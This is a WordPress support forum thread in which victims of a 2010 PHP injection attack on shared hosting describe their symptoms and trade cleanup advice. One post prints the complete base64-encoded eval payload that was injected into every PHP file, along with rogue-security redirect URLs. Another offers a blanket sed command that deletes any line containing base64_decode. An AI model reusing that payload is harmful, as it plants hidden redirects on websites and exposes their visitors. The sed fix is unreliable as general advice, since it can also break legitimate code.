WordPress › Support » WordPress Site Hacked

Hema Latha
Member
Posted 3 years ago #

Both wp-adin/dashboard and my site is getting redirected to:

[Mod note - links removed]

Today, 04/14/2010 i logged into dashboard and it was crashed.
I tried to refresh many a times and it still was crashed,
and i saw this address running fast in the Task Bar:

[Mod note - links removed]

After sometime the dashboard started redirecting to bing.com mentioned above.

Changes i did today:

1. Uninstalled wp-united.
2. Uninstalled Phpbb.
3. Installed Beeline wp plugin.
4. INSTALLED wp plugin Tal.Ki (Tal.ki Embeddable Forums)

I came to know my site has been HACKED and googled few solutions.

1. Changed Wp Admin Password.
2. Changed FTP Password.
3. Saw this code in Page Source:

<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {
	next: "Next >",
	prev: "< Prev",
	image: "Image",
	of: "of",
	close: "Close"
};
try{convertEntities(thickboxL10n);}catch(e){};
var commonL10n = {
	warnDelete: "You are about to permanently delete the selected items.\n  \'Cancel\' to stop, \'OK\' to delete."
};
try{convertEntities(commonL10n);}catch(e){};
var wpAjax = {
	noPerm: "You do not have permission to do that.",
	broken: "An unidentified error has occurred."
};
try{convertEntities(wpAjax);}catch(e){};
var adminCommentsL10n = {
	hotkeys_highlight_first: "",
	hotkeys_highlight_last: ""
};
var plugininstallL10n = {
	plugin_information: "Plugin Information:"
};
try{convertEntities(plugininstallL10n);}catch(e){};
/* ]]> */
</script>
<script type='text/javascript' src='http://indiangirlsclub.com/wp-admin/load-scripts.php?c=1&load=thickbox,hoverIntent,common,jquery-color,jquery-ui-core,jquery-ui-sortable,wp-ajax-response,wp-lists,jquery-ui-resizable,admin-comments,postbox,dashboard,plugin-install,media-upload&ver=b92e060c1632e7b2fe6ec9809056c0d0'></script>

<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
<script src="[Mod note - links removed]/js.php"></script>

5. Removed this code from Index.php and Load-Scripts.php :

<?php /**/ eval(base64_decode[Mod note - base64 code removed]"));?>

6. Uninstalled Tal.Ki Plugin.

Still my site is not clean.

It's getting redirected to :

[Mod note - links removed]

Site Url: http://indiangirlsclub.com
Please HELP me. I'm not a tech savvy. What else should i do ???

jirikai
Member
Posted 3 years ago #

I am also having an issue with this. totally lost as to how I might go about fixing it. attemtping to scan databse.
jonradio
Member
Posted 3 years ago #

Hopefully, this will help:
http://codex.wordpress.org/FAQ_My_site_was_hacked

I also see that someone else is reporting this same problem:
http://wordpress.org/support/topic/388395?replies=1
jonradio
Member
Posted 3 years ago #

This appears to be a fix for GoDaddy customers:
http://inspirated.com/2010/03/02/wordpress-ninoplas-virus-and-the-fix
jirikai
Member
Posted 3 years ago #

I saw some Base64 coding at the top of my index.php file in my root folder.

Erased that and another .php file called "Florence_sdjfskd.php" or something similar. Can't remember exactly. this file also contained a ton of coding.
My site is now back to working normally.

No idea if this problem will arise again tonight or not as all I have done it treat the infection, not the cause. Think it's time for a wordpress core update as this appears to be a security flaw.

while i am indeed with godaddy, other people around the net are complaining from other hosts also and i very much doubt we've all been hit by the same keylogger or malware.
jirikai
Member
Posted 3 years ago #

thanks by the way Adiant. Wouldn't have thought to check the top of my index.php without your advice.
jonradio
Member
Posted 3 years ago #

Think it's time for a wordpress core update as this appears to be a security flaw.

Not from what I've read. Other software is being hit, too.

Ask yourself how index.php is being modified. To me, that sounds like hackers have gained access to your web host, which is not something that WordPress can stop.
jirikai
Member
Posted 3 years ago #

it isn't only godaddy hosted sites.

http://forums.overclockers.co.uk/showthread.php?t=18128737
They go on to ramble about random reasons and getting nowhere fast but the first post says all I need to see.

hosted on freedom-2-surf (f2s)

I remember reading about a couple of other hosts also as i crawled the net for a possible solution. Godaddy isn't the only hosting company being targeted. This is what leads me to believe it is a WordPress issue and not hosting issue.

The number of people being hit at once negates the chances of it being malware or keyloggers of some sort. the multiple different hosting companies negates the chances of it being a hosting issue. That leads only 1 remaining common element. the CMS WordPress.

Of course there is always a chance that it is godaddy that is targeted and the others i saw from other hosters have been hit my malware but for it all to happen at roughly the same time leads me to believe that isn't the case. Could be wrong but doubt it.
jonradio
Member
Posted 3 years ago #

There are many other explanations. For example, FTP ID/password databases built by hackers over the last year. Malware on machines of anyone with the FTP ID and password for a hosting account sends them to a central hacker database. Could have happened during a single infection 8 months ago.

The "all hit at once" syndrome is also a sign it could be hackers. They do automated mass attacks. For example, in my FTP scenario, they would go to their database of thousands of FTP ID/password/host name combinations, and attack them all at once, and make the changes you've seen.

This is not Sci-Fi. This happened around the Labour Day weekend last summer.

Again, if this were peculiar to WordPress security, then only WordPress would have been compromised. Instead, many other pieces of software are being hit.
jirikai
Member
Posted 3 years ago #

I'm fully aware such things are not sci-fi lol. There is a distinct chance you are correct.

However i am not finding any results of this issue for any other CMS. I've tried searching Joomla and Drupal in the hopes they might have found a solution that i could use to no joy.

If you can provide links of where you found the other pieces of software being hit, it'd be appreciated. Any and all information regarding this issue is welcomed as even the slightest hint from a different CMS could lead to a realisation of a fix for our own.
jonradio
Member
Posted 3 years ago #

On another forum, Hema says:
"It's just not only the WordPress ... I also have topsites directory, 4images, Another WordPress with Buddypress installed in the root."
ref. - http://forums.digitalpoint.com/showthread.php?t=1770144 (scroll down a way)
Hema Latha
Member
Posted 3 years ago #

The "eval base 64" code is just not only in Index.php and Load-Scripts.php
But through out my FTP php files. And i have spent a whole night deleting the codes from wp-admin, wp-content and wp-includes.

But it's still present in plugins, themes, 4images, topsites directory and more. I don't think it's possible to delete each and every php file manually.

I have no idea how to use clean-ninoplas.sh script.
I do understand i can change the needle. But bash, ssh .. ?

I have also contacted Godaddy support and waiting for their reply.
wpsecuritylock
Member
Posted 3 years ago #

I just got done fixing someone's site who was on Godaddy with this same problem.

First thing you should do is...

Change your hosting account, ftp, wordpress username, and database passwords.

If you're using Godaddy on a Linux Hosting Account...

Login into your hosting account, go to File Manager, click on the "History" tab and see if you have a snapshot of your website before it got hacked.

Here's how to restore it if you have a snapshot prior to the attack...

1. Go to your Godaddy hosting account "File Manager."

1. Click on "Current" tab and delete all files on your server. This is necessary to get rid of any "extra" files that may have been uploaded.

** Note **
Do not delete or restore the _db_backups or php_uploads. These are part of Godaddy's structure and shouldn't be touched.

2. Click on "History" tab and checkmark 3-4 files/directories at a time (so you don't overload the server). Then click on the "Restore" icon. Repeat this process until all files are restores.

3. Edit your wp-config.php file with your new database password. And make sure you add/change your Authentication Unique Keys.

Here's a article on how to use Restore...
http://community.godaddy.com/help/2009/02/02/restoring-a-linux-hosting-account/

If you need further assistance, please let me know.

Hope that helps.
tdjcbe
Member
Posted 3 years ago #

Anything else think a mod should break the offending links? :)
Rev. Voodoo
Volunteer Moderator
Posted 3 years ago #

base64 stuff that you find in php files often comes in through a backdoor php file on your server..... here's what I went througha while back when I got hacked (on godaddy)

http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/
mrmist
Forum Janitor
Posted 3 years ago #

The redirection links etc. have been removed from the OP.
tdjcbe
Member
Posted 3 years ago #

@mrmist too bad though that you removed the domains so now we can't point folks here to let them know what to look for.

Someone care to return the domains in question but break the links please? That way others can read this thread and know what to look for?

Thanks
mrmist
Forum Janitor
Posted 3 years ago #

I don't really see the benefit in having the spam links added back, be they broken or otherwise. Most likely it's different for everyone, and in any event I'm not convinced it's of value.

Sheesh, you really can't please everyone.
rockinmama
Member
Posted 3 years ago #

For the record: My fix and an observation...

I noticed the other day that my WP admin dashboard was screwy and posting was nearly impossible. My friend suggested logging in to GoDaddy and installing the latest WP patch. That seemed to take care of it. Except the base64 code was still around and the strange script url in question kdjkfjskd...com/js.php (at the end of html code on all pages on my site) kept showing up.
Obviously, not fixed. So check the last few lines of your page source code if you aren't sure if its gone!

So I started the process of backing up and restoring. In that process I noticed an odd php file in the root directory which had nothing but base64 code. Decoding it showed that exact offending url and lots of commands that I have no clue about. I can only guess it to be the source of the infection. Don't know how it got there (would like to know- guess a call to GoDaddy is in order to see if they can check ftp logs), but can tell from the restore history that it showed up on 14 April. I copy/pasted everything that I'd written this week to a word doc and restored to pre-infection. And Promptly changed passwords and virus scanned all my computers.

Curious about that file, so I checked my friend's Site, same file, but a different name: Mine was called "public_ride.php", hers called "surprised_nealson.php".

Considering the alternative of having to wipe the site completely and re-upload, I'm relieved that this seems to have solved it. Now we need to figure out how this happened.

For what its worth!
Hema Latha
Member
Posted 3 years ago #

@ rockinmama ..

In the root directory, they had placed a file: "lira_seville.php",
which contained only those Eval Base64 codes.

Suddenly another folder is present: .hcc.thumbs
Not sure what it is, I deleted that too.

And even after removing all those codes MANUALLY,
my blog showed those "...kdjkfjskdfjlskdjf...com"

I have completely deleted everything in the FTP except wp-content.
Replaced all wordpress files freshly downloaded.
Things seem to work smoothly.

But still afraid about the BACKDOORS as i'm not familiar with database.
I have installed few plugins for security, database and firewall.

Lost 4images, Topsites Directory, Forum, Another wp blog installed in the same root directory with buddypress.

Googling revealed that most of the blogs hacked were in Godaddy Shared Hosting Server.

THIS IS THE REPLY WE RECEIVED FROM GODADDY SUPPORT:

Measures are in place to protect the overall security of the shared hosting server on which your website resides. The compromise of your account is outside of the scope of security that we provide for you. Virus scans are performed on the content that is hosted, but they may not pick up everything, largely due to the fact that hackers tend to upload custom scripts which are not picked up by traditional malware scanners. However, if a virus is detected, you will be notified. The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.

Let me know how was the blogs hacked !
(so that we can avoid such mistakes in future).
jonradio
Member
Posted 3 years ago #

I believe that this is the official WordPress explanation of what happened to you, Hema:
http://wordpress.org/development/2010/04/file-permissions/

And I concur: it really is up to web hosting companies to prevent, by default, any visibility of your files and databases to other users of the same web server. Yes, I know they call it a "shared hosting environment", but I have every right to expect web hosting companies to have the smarts to protect me from everyone else on the same server.
MsBsome
Member
Posted 3 years ago #

I had the same thing happen to me on a Linux GoDaddy server. It hit every php file. I had to uninstall and reinstall everything including WP. I must have made 50 phone calls to GoDaddy. They were helpful- probably spoke to wpsecuritylock above who happens to be my hero at the moment.

This thing is nasty!
lijumathewliju
Member
Posted 3 years ago #

Hello,

The same thing was happened on my php site but it's not using word press. The same script was ejecting if the user remove the valuse starting on "base64_decode" on index.php. All the files are injected this values. I'm using Godaddy Hosting and I didn't get a satisfactory response from them yet.

This patch will cure my problem.

SSH to server and execute this command. Switch to "html folder" and then execute.

$find . -type f -name "*.php" -exec sed -i '/base64_decode/d' {} \;

http://serveridol.com
Dmgeo
Member
Posted 3 years ago #

It's a nasty malware but it's not that hard to get rid of. If you have GoDaddy you can use their file manager to restore your files. Change all your passwords to secure ones. More info on the fix here.
redkathy
Member
Posted 3 years ago #

I have shared hosting on godaddy. Random php files in six sites were hit. I have cleaned and restored all but word press site. I saved a restore from an earlier date and then did the restore locally using Deamweaver cs3. Every site is clean BUT WordPress and I can't find any infected files. I still see that script at the end when I view the source page. Any advice for me?
Hema Latha
Member
Posted 3 years ago #

WORDPRESS BLOG HACKED AGAIN ......... !!!!!!!!!

My blog is hacked again.
I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

It's again has the same script in the Page Source:

<script src="http:// kdjkfjskdfjlskdjf . com/kp.php"></script>

And my antivirus program has blocked my site and giving an Alert.
Site is getting redirected to the below link.

http:// www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D

All the php files have this code on the first line:
<?php /**/ eval(base64_decode (" aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

I feel to Quit blogging.
Hema Latha
Member
Posted 3 years ago #

@ Dmgeo ...

As you suggested i Restored all the files using Godaddy File Manager.

Site is working and unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

But when i tried to Login to Wp-admin, I got this message from AVG:

Threat was blocked!

File name: http: / / www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5oWKeih9eipqCecV6aoaXGaorcmpWkcVih1GqTYmKUXpmYkWNrZ2SXlJVfpJmfcaCorKmbXJPPn5SWlaCfzZ%2FOo5PSosWSxqCkYa3Vjs%2BomZ2nYqicqHjTksjPo5WQqJGs02rKpKTWUpaliGN9V2irytGdm5Wnm6GmpKzEmdnIX5OcoVdqqqTSXZHKmszSiGN9WKrYnpRraWZwaHBrbm%2BHodeYbmFfa2RvmGWZZmaMkMahrH9dqZ%2FJnptyag%3D%3D

Threat name: Exploit Rogue Security Threat Analysis 9type 1007)

I'm unable to access the wp admin/login panel.
Hema Latha
Member
Posted 3 years ago #

ISSUE RESOLVED TEMPORARILY

1. Restored files using Godaddy file manager.

After restoration, site worked but the Login/Admin page was redirected to the virus site.

2. Replaced Wp-admin & Wp-includes.

Issue resolved.

WAITING FOR THE THIRD ATTACK

Topic Closed

This topic has been closed to new replies.

WordPress.org

Forums

WordPress Site Hacked (28 posts)

Topic Closed

About this Topic

Tags

Code is Poetry